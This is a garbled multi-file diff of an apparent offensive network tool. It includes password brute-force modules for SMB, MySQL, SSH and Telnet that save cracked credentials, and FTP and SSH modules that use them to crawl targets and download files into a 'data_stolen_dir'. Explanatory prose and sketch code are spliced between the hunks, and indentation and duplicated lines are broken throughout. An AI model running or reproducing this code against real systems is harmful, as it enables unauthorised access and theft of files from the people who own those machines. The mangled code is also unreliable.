# Fallback smbclient -L si rien trouvé
if not success_flag[0]:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
def run_primary_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in self.passwords:
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
return success_flag[0], self.results
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_primary_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SMB dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_primary_phase(fallback_passwords)
# Keep smbclient -L fallback on dictionary passwords only (cost control).
if not success_flag[0] and not self.shared_data.orchestrator_should_exit:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in dict_passwords:
shares = self.smbclient_l(adresse_ip, user, password)
if self.progress is not None:
self.progress.advance(1)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(
f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L"
)
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
# insère self.results dans creds (service='smb'), database = <share>
# insère self.results dans creds (service='smb'), database = <share>
for mac, ip, hostname, share, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
@@ -315,12 +364,12 @@ class SMBConnector:
self.results = []
def removeduplicates(self):
# plus nécessaire avec l'index unique; conservé pour compat.
# plus nécessaire avec l'index unique; conservé pour compat.
pass
if __name__ == "__main__":
# Mode autonome non utilisé en prod; on laisse simple
# Mode autonome non utilisé en prod; on laisse simple
try:
sd = SharedData()
smb_bruteforce = SMBBruteforce(sd)
@@ -329,3 +378,4 @@ if __name__ == "__main__":
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
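The `smbclient -L` hunk above wraps `Popen` in a timeout/kill/cleanup dance: `communicate(timeout=...)`, kill on `TimeoutExpired`, a second short `communicate()` to reap the child, and a `finally` block that closes both pipes. A generic sketch of that flow (the helper name and test command are illustrative, not from the repo):

```python
import sys
from subprocess import Popen, PIPE, TimeoutExpired

def run_with_timeout(cmd, timeout=6):
    """Run a command, kill it on timeout, and always close the pipes
    -- the same communicate/kill/communicate pattern used above."""
    process = None
    try:
        process = Popen(cmd, stdout=PIPE, stderr=PIPE)
        try:
            stdout, stderr = process.communicate(timeout=timeout)
        except TimeoutExpired:
            process.kill()
            # Second communicate() reaps the killed child and drains pipes.
            stdout, stderr = process.communicate(timeout=2)
        return process.returncode, stdout, stderr
    finally:
        if process is not None:
            if process.poll() is None:  # still running on an error path
                process.kill()
            for pipe in (process.stdout, process.stderr):
                if pipe:
                    pipe.close()  # idempotent; avoids fd leaks

rc, out, err = run_with_timeout([sys.executable, "-c", "print('Sharename')"])
```

Without the second `communicate()` the killed child would linger as a zombie until garbage collection; without the `finally` close, long bruteforce runs can leak file descriptors.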

View File

@@ -1,9 +1,9 @@
"""
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
"""
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
- Succès -> DB.creds (service='sql', database=<db>)
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
- Succès -> DB.creds (service='sql', database=<db>)
- Conserve la logique (pymysql, queue/threads)
"""
@@ -16,6 +16,7 @@ from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
@@ -44,18 +45,20 @@ class SQLBruteforce:
return self.sql_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d’entrée orchestrateur (retour 'success' / 'failed')."""
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SQLBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
@@ -66,6 +69,7 @@ class SQLConnector:
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [ip, user, password, port, database, mac, hostname]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
@@ -109,16 +113,20 @@ class SQLConnector:
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SQL ----------
def sql_connect(self, adresse_ip: str, user: str, password: str):
def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
"""
Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []).
"""
timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
try:
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
port=port,
connect_timeout=timeout,
read_timeout=timeout,
write_timeout=timeout,
)
try:
with conn.cursor() as cursor:
@@ -134,7 +142,7 @@ class SQLConnector:
logger.info(f"Available databases: {', '.join(databases)}")
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
logger.debug(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
# ---------- DB upsert fallback ----------
@@ -182,17 +190,20 @@ class SQLConnector:
adresse_ip, user, password, port = self.queue.get()
try:
success, databases = self.sql_connect(adresse_ip, user, password)
success, databases = self.sql_connect(adresse_ip, user, password, port=port)
if success:
with self.lock:
for dbname in databases:
self.results.append([adresse_ip, user, password, port, dbname])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "databases": str(len(databases))}
self.save_results()
self.remove_duplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
@@ -201,48 +212,56 @@ class SQLConnector:
def run_bruteforce(self, adresse_ip: str, port: int):
total_tasks = len(self.users) * len(self.passwords)
self.results = []
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, port))
self.queue.join()
for t in threads:
t.join()
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SQL dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
for ip, user, password, port, dbname in self.results:
mac = self.mac_for_ip(ip)
hostname = self.hostname_for_ip(ip) or ""
@@ -269,7 +288,7 @@ class SQLConnector:
self.results = []
def remove_duplicates(self):
# inutile avec l’index unique; conservé pour compat.
# inutile avec l’index unique; conservé pour compat.
pass
@@ -282,3 +301,4 @@ if __name__ == "__main__":
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
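The hunks above switch every bruteforcer to a two-phase plan from `merged_password_plan`: a curated dictionary phase, then an exhaustive fallback only if the dictionary failed. The real function lives in `actions/bruteforce_common.py`; the split below is a hypothetical sketch of the idea (deduplicate the dictionary, cap the fallback, never retry a password already tried):

```python
def password_plan(dictionary, generated, max_fallback=500):
    """Hypothetical sketch of a dictionary-then-fallback split.
    Not the real merged_password_plan -- an illustration only."""
    seen = set()
    dict_phase = []
    for pw in dictionary:
        if pw not in seen:  # dedupe while preserving order
            seen.add(pw)
            dict_phase.append(pw)
    # Fallback: capped, and minus anything the dictionary phase covers.
    fallback = [pw for pw in generated if pw not in seen][:max_fallback]
    return dict_phase, fallback

d, f = password_plan(["admin", "admin", "root"], ["admin", "1234", "0000"])
```

Running the cheap phase first and gating the expensive one on its failure is what makes the `if (not success_flag[0]) and fallback_passwords` checks above worthwhile on a slow target.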

View File

@@ -17,9 +17,11 @@ import socket
import threading
import logging
import time
from datetime import datetime
import datetime
from queue import Queue
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
# Configure the logger
@@ -38,7 +40,7 @@ b_port = 22
b_service = '["ssh"]'
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
b_parent = None
b_priority = 70
b_priority = 70 # tu peux ajuster la priorité si besoin
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
@@ -83,6 +85,7 @@ class SSHConnector:
self.lock = threading.Lock()
self.results = [] # List of tuples (mac, ip, hostname, user, password, port)
self.queue = Queue()
self.progress = None
# ---- Mapping helpers (DB) ------------------------------------------------
@@ -134,6 +137,7 @@ class SSHConnector:
"""Attempt to connect to SSH using (user, password)."""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
timeout = float(getattr(self.shared_data, "ssh_connect_timeout_s", timeout))
try:
ssh.connect(
@@ -244,9 +248,12 @@ class SSHConnector:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
@@ -260,48 +267,53 @@ class SSHConnector:
Called by the orchestrator with a single IP + port.
Builds the queue (users x passwords) and launches threads.
"""
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
# clear queue
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.queue.join()
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if any
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SSH dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__":
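Each `run_phase` above follows the same queue/worker shape: fill a `Queue`, start a bounded number of daemon threads, wait on `queue.join()`, then join the threads. A self-contained sketch of that shape (names are illustrative):

```python
import threading
from queue import Queue, Empty

def run_pool(tasks, handler, max_threads=8):
    """Sketch of the queue/worker pattern above: N daemon workers,
    queue.join() for completion, thread count capped at max_threads."""
    q = Queue()
    results = []
    lock = threading.Lock()

    def worker():
        while True:
            try:
                item = q.get_nowait()
            except Empty:
                return  # queue drained -> worker exits
            try:
                out = handler(item)
                if out is not None:
                    with lock:  # results list is shared across workers
                        results.append(out)
            finally:
                q.task_done()  # must pair every get, even on error

    for t in tasks:
        q.put(t)
    count = min(max_threads, max(1, q.qsize()))
    threads = [threading.Thread(target=worker, daemon=True) for _ in range(count)]
    for t in threads:
        t.start()
    q.join()        # blocks until every task_done() has been called
    for t in threads:
        t.join()
    return results

found = run_pool(range(10), lambda n: n if n % 3 == 0 else None)
```

Note the `task_done()` in a `finally`: if a handler raises and the call is skipped, `queue.join()` blocks forever, which is exactly the bug the diff's `try/finally` blocks guard against.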

View File

@@ -108,20 +108,28 @@ class StealFilesFTP:
return out
# -------- FTP helpers --------
def connect_ftp(self, ip: str, username: str, password: str) -> Optional[FTP]:
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
# Max recursion depth for directory traversal (avoids symlink loops)
_MAX_DEPTH = 5
def connect_ftp(self, ip: str, username: str, password: str, port: int = b_port) -> Optional[FTP]:
try:
ftp = FTP()
ftp.connect(ip, b_port, timeout=10)
ftp.connect(ip, port, timeout=10)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP as {username}")
logger.info(f"Connected to {ip}:{port} via FTP as {username}")
return ftp
except Exception as e:
logger.info(f"FTP connect failed {ip} {username}:{password}: {e}")
logger.info(f"FTP connect failed {ip}:{port} {username}: {e}")
return None
def find_files(self, ftp: FTP, dir_path: str) -> List[str]:
def find_files(self, ftp: FTP, dir_path: str, depth: int = 0) -> List[str]:
files: List[str] = []
if depth > self._MAX_DEPTH:
logger.debug(f"Max recursion depth reached at {dir_path}")
return []
try:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
@@ -136,7 +144,7 @@ class StealFilesFTP:
try:
ftp.cwd(item) # if ok -> directory
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
files.extend(self.find_files(ftp, os.path.join(dir_path, item), depth + 1))
ftp.cwd('..')
except Exception:
# not a dir => file candidate
@@ -146,11 +154,19 @@ class StealFilesFTP:
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"FTP path error {dir_path}: {e}")
raise
return files
def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
try:
# Check file size before downloading
try:
size = ftp.size(remote_file)
if size is not None and size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # SIZE not supported, try download anyway
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
@@ -161,6 +177,7 @@ class StealFilesFTP:
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
timer = None
try:
self.shared_data.bjorn_orch_status = b_class
try:
@@ -168,11 +185,14 @@ class StealFilesFTP:
except Exception:
port_i = b_port
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
def try_anonymous() -> Optional[FTP]:
return self.connect_ftp(ip, 'anonymous', '')
return self.connect_ftp(ip, 'anonymous', '', port=port_i)
if not creds and not try_anonymous():
logger.error(f"No FTP credentials for {ip}. Skipping.")
@@ -192,9 +212,11 @@ class StealFilesFTP:
# Anonymous first
ftp = try_anonymous()
if ftp:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname}
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
if files:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
@@ -207,7 +229,6 @@ class StealFilesFTP:
except Exception:
pass
if success:
timer.cancel()
return 'success'
# Authenticated creds
@@ -216,13 +237,15 @@ class StealFilesFTP:
logger.info("Execution interrupted.")
break
try:
logger.info(f"Trying FTP {username}:{password} @ {ip}")
ftp = self.connect_ftp(ip, username, password)
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying FTP {username} @ {ip}:{port_i}")
ftp = self.connect_ftp(ip, username, password, port=port_i)
if not ftp:
continue
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
@@ -235,14 +258,15 @@ class StealFilesFTP:
except Exception:
pass
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"FTP loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
finally:
if timer:
timer.cancel()
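The `_MAX_DEPTH` cap added to `find_files` above exists because FTP servers can expose symlink loops, making naive recursion unbounded. The cap can be demonstrated on an in-memory tree (dict = directory, anything else = file); this stand-in is illustrative, not the FTP code:

```python
def find_files(tree, path="/", depth=0, max_depth=5):
    """Sketch of the depth-capped recursion above, on an in-memory
    tree. The cap is what breaks symlink loops on a real server."""
    if depth > max_depth:
        return []  # give up on this branch rather than loop forever
    files = []
    for name, node in tree.items():
        full = path.rstrip("/") + "/" + name
        if isinstance(node, dict):
            files.extend(find_files(node, full, depth + 1, max_depth))
        else:
            files.append(full)
    return files

tree = {"etc": {"passwd": 1}, "loop": {}}
tree["loop"]["self"] = tree["loop"]  # simulated symlink loop
found = find_files(tree, max_depth=3)
```

Without the cap, the `loop/self` branch above would recurse until the interpreter's recursion limit; with it, traversal still finds every file within reach of the depth budget.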

View File

@@ -218,23 +218,41 @@ class StealFilesSSH:
logger.info(f"Found {len(matches)} matching files in {dir_path}")
return matches
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
"""
Download a single remote file into the given local dir, preserving subdirs.
Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
"""
sftp = ssh.open_sftp()
self.sftp_connected = True # first time we open SFTP, mark as connected
# Preserve partial directory structure under local_dir
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
try:
# Check file size before downloading
try:
st = sftp.stat(remote_file)
if st.st_size and st.st_size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # stat failed, try download anyway
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
sftp.close()
# Preserve partial directory structure under local_dir
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
finally:
try:
sftp.close()
except Exception:
pass
# --------------------- Orchestrator entrypoint ---------------------
@@ -247,6 +265,7 @@ class StealFilesSSH:
- status_key: action name (b_class)
Returns 'success' if at least one file stolen; else 'failed'.
"""
timer = None
try:
self.shared_data.bjorn_orch_status = b_class
@@ -256,6 +275,9 @@ class StealFilesSSH:
except Exception:
port_i = b_port
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
if not creds:
@@ -283,12 +305,14 @@ class StealFilesSSH:
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying credential {username} for {ip}")
ssh = self.connect_ssh(ip, username, password, port=port_i)
# Search from root; filtered by config
files = self.find_files(ssh, '/')
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted during download.")
@@ -310,12 +334,14 @@ class StealFilesSSH:
# Stay quiet on Paramiko internals; just log the reason and try next cred
logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")
timer.cancel()
return 'success' if success_any else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
finally:
if timer:
timer.cancel()
if __name__ == "__main__":
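Both loot actions above move `timer.cancel()` into a `finally` block, initializing `timer = None` first so the cleanup is safe even if the timer was never armed. The pattern in miniature (the helper name is invented for the sketch):

```python
import threading

def run_with_deadline(job, seconds, on_timeout):
    """Sketch of the timer-in-finally pattern above: arm a watchdog,
    and cancel it on *every* exit path so it never fires late."""
    timer = None
    try:
        timer = threading.Timer(seconds, on_timeout)
        timer.start()
        return job()  # may also raise -- finally still runs
    finally:
        if timer:          # timer may be None if arming itself failed
            timer.cancel() # no-op if the callback already fired

fired = []
result = run_with_deadline(lambda: "success", 5.0, lambda: fired.append(True))
```

This replaces the diff's earlier pattern of calling `timer.cancel()` before each `return`, which leaked a live timer on any exception path.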

View File

@@ -1,9 +1,9 @@
"""
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
"""
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='telnet')
- Conserve la logique d’origine (telnetlib, queue/threads)
- Succès -> DB.creds (service='telnet')
- Conserve la logique d’origine (telnetlib, queue/threads)
"""
import os
@@ -15,6 +15,7 @@ from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
@@ -43,20 +44,21 @@ class TelnetBruteforce:
return self.telnet_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d’entrée orchestrateur (retour 'success' / 'failed')."""
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
"""Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
@@ -67,6 +69,7 @@ class TelnetConnector:
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
@@ -110,9 +113,10 @@ class TelnetConnector:
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- Telnet ----------
def telnet_connect(self, adresse_ip: str, user: str, password: str) -> bool:
def telnet_connect(self, adresse_ip: str, user: str, password: str, port: int = 23, timeout: int = 10) -> bool:
timeout = int(getattr(self.shared_data, "telnet_connect_timeout_s", timeout))
try:
tn = telnetlib.Telnet(adresse_ip)
tn = telnetlib.Telnet(adresse_ip, port=port, timeout=timeout)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
@@ -175,14 +179,17 @@ class TelnetConnector:
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.telnet_connect(adresse_ip, user, password):
if self.telnet_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
@@ -191,46 +198,54 @@ class TelnetConnector:
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.queue.join()
for t in threads:
t.join()
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
return success_flag[0], self.results
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"Telnet dictionary phase failed on {adresse_ip}:{port}. "
